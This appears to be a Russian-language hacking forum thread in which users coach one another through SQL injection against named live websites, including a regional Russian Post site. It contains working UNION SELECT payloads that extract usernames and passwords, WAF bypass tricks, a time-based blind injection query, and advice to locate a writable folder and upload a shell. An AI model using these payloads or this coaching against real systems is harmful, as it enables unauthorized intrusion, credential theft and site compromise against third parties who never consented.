Помогите раскрутить) Code: http://www.hs-karlsruhe.de/studierende/career-services/existenzgruendung/umfrage-start-up/umfrageformular-start-up.html?tx_powermail_pi1%5Baction%5D=confirmation&tx_powermail_pi1[__referrer][@extension]=Powermail&tx_powermail_pi1[__trustedProperties]=a:2:{s:5:%22field%22;a:5:{s:6:%22UID332%22;i:1;s:6:%22UID333%22;i:1;s:6:%22UID338%22;i:1;s:6:%22UID334%22;i:1;s:4:%22__hp%22;i:1;}s:4:%22mail%22;a:1:{s:4:%22form%22;i:1;}}20cf2e8161f6dd6d8c7a69e5ca62625ea6a4f36a&tx_powermail_pi1[field][__hp]=&tx_powermail_pi1[mail][form]=55 пробелы убрать
Здраствуйте. Помогите разобратся. Нашел скулю и все хорошо, нашел таблицу user, нашел в ней столбцы User, Password. Хочу вывести но когда сталю id=-561'+union+select+1,User,Password,4,5,6,7+FROM+user+--+ ничего не выводить. Помогите, как зделать?
захексить или зачарить, или добавить лимит, или заюзать что-то типа: INSERT(insert(table_schema,1,0,0x3a3a3a),1,0,tAble_Name) MAKE_SET(1|2,@@version,USER()) EXPORT_SET(1,user(),version(),',',2) LPAD('Chat','8','Anti') или обойти WAF,например, если 403: Access Forbidden Обходится элементарно с помощью "(" и ")", /**/, %0А, %0d, %09, %20 и т.д., или Sucuri WebSite Firewall - CloudProxy - Access Denied Обходится так: union/*123*/select и т.д. Короче, вобщем смотря по ситуации что там.
Вот скуля www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,2,url,4,5,6,7+from+news-- ничего не выводит, что тут делать?
Дело в том, что надо указывать бд http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,2,url,4,5,6,7+from+konkurs.news-- http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,User,Password,4,5,6,7+from+ftpusers.users-- а вообще root mq off
узнал бд. называется ufps. и подставляю, получается http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,User,Password,4,5,6,7+from+ufps.users-- все равно ошибка, пожалуйста подскажите, что такое?
ufps это current_table. а тебе нужна база, в которой лежит таблица users. а лежит она в базе ftpusers Code: from ftpusers.users
А как вы узнали что таблица лежить в базе ftpusers. Никак немогу понять, можете рассказать пожалуйста
либо почитай мануал, как узнать таблици и колонки в БД права БД рутовые, кавычки не фильтруются и не слешируются: вам остается только найти врайтабельную папку и залить шелл P.S: 2011 УФПС Волгоградской области - филиал ФГУП «Почта России» Помните об ответственности ломая подобные ресурсы!!!
Есть blind sql injection, как правильно узнать длинну получаймой колонки. Использую такой запрос: Code: SELECT IF (SUBSTRING(LENGTH(login),{x},1) = {y}, SLEEP(5), 0) FROM users LIMIT 1 где {y} перебираймые значения "0,1,2,3,4,5,6,7,8,9" Проблема в том, что substring возвращает "0", когда положение {x} вышло за длинну записи. В итоге получается, что при попытке получить второе значение (x=2), а истинная длинна = 5, то получаем, что длинна колонки = 50. Собственно задача - правильно узнать длинну содержимого колонки, без лишних запросов. upd. Решено
может вместо login пехать что-нить такое: select column_name from information_schema.tables where table_name='users'
